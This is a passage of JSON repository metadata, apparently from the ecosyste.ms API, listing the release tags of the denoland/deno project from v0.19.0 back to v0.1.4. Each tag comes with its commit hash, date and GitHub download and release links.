github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"d